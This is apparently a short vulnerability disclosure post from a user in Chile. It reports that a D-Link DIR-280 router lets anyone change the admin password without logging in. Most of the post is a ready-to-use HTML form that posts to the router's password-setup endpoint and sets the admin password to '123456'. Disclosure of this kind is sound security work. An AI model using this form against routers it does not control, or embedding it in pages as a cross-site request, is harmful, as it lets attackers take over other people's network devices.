Hi!, i think i just found a security problem in my D-LINK DIR-280 router, if
i send the form with a new admin password it change, even if you are not
logged.
I test this and it works, but it will be better if somebody else test it
too.

is just the form from the config site opened in my own browser.

D-LINK DIR-280 Change Password <br>
New User: admin <br>
New Pass: 123456 <br>
Check the router IP. [192.168.0.1 is the Default]
<form id="pwdform" name="password" method="POST" action="
http://192.168.0.1/goform/formPasswordSetup">
<input type="hidden" name="submit-url" value="/tools_admin.asp">
<input type="hidden" name="save" value="Apply Changes">
<input type="hidden" value="admin" name="adminname">
<input type="hidden" value="123456" name="newpass">
<input type="hidden" value="123456" name="confpass">
<input type="hidden" value="0" name="bEnableRomate">
<input type="hidden" value="*" name="RomateIP">
<input type="hidden" value="80" name="RomatePort">
<input type="hidden" value="" name="username">
<input type="hidden" value="" name="userpass">
<input type="submit" value="GO GO GO!">
</form>

I hope this could be useful.

sorry i now my english sux. spanish is my first languaje.


greeting from Chile

-- 
Andrés Otondo